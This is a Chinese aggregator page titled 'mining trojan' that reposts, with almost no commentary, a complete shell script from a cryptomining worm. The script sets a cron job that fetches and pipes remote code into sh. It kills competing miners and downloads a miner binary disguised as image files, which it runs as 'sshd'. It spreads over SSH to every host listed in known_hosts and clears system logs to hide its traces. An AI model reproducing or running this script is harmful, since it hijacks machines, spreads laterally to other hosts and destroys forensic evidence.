挖矿木马

Posted 2020-08-17 water-sky

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了挖矿木马相关的知识，希望对你有一定的参考价值。

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

mkdir -p /tmp
chmod 1777 /tmp

echo "*/10 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh" | crontab -

ps -ef|grep -v grep|grep hwlh3wlh44lh|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk ‘{print $2}‘ | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "sustse"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "axgtbc"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "axgtfa"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk ‘{print $2}‘|xargs kill -9

rm -rf /tmp/busybox
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then
    chattr -i sshd
    rm -rf sshd
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190603/9f283ac6216b4865bf5e269e2dba47b3.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190603/9f283ac6216b4865bf5e269e2dba47b3.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL hTTps://yzf.qq.com/fsnb/kf-file/kf_pic/20190603/KFPIC_h51c40795830e309c3bb10ea7740_WXIMAGE_angVqYHOYGajYbFSHGRR.jpg -o sshd||wget --timeout=30 --tries=3 -q hTTps://yzf.qq.com/fsnb/kf-file/kf_pic/20190603/KFPIC_h51c40795830e309c3bb10ea7740_WXIMAGE_angVqYHOYGajYbFSHGRR.jpg -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559574171568/3.864055421690409.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559574171568/3.864055421690409.jpg -O sshd) && chmod +x sshd
    else
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190603/ab4e5d2c70904590b3f8ac1b6f3dd1c0.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190603/ab4e5d2c70904590b3f8ac1b6f3dd1c0.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL hTTps://yzf.qq.com/fsnb/kf-file/kf_pic/20190603/KFPIC_h51c40795830e309c3bb10ea7740_WXIMAGE_CXIcRlREbdbjfNuhRIYp.jpg -o sshd||wget --timeout=30 --tries=3 -q hTTps://yzf.qq.com/fsnb/kf-file/kf_pic/20190603/KFPIC_h51c40795830e309c3bb10ea7740_WXIMAGE_CXIcRlREbdbjfNuhRIYp.jpg -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559574229581/6.470362475964859.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559574229581/6.470362475964859.jpg -O sshd) && chmod +x sshd
    fi
        $(pwd)/sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || ./sshd || /tmp/sshd || /usr/local/sbin/sshd
fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &‘ & done
fi

for file in /home/*
do
    if test -d $file
    then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &‘ & done
        fi
    fi
done

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#

以上是关于挖矿木马的主要内容，如果未能解决你的问题，请参考以下文章

微软宣布使用Intel TDT技术检测挖矿木马

Xmrig挖矿木马之暴力分析！

应急响应--记录一次漏洞紧急处理中意外发现的挖矿木马（Shiro反序列化漏洞和ddg挖矿木马）

Xmrig挖矿木马分析

安全通告：针对SaltStack远程命令执行漏洞植入挖矿木马的应急响应

挖矿木马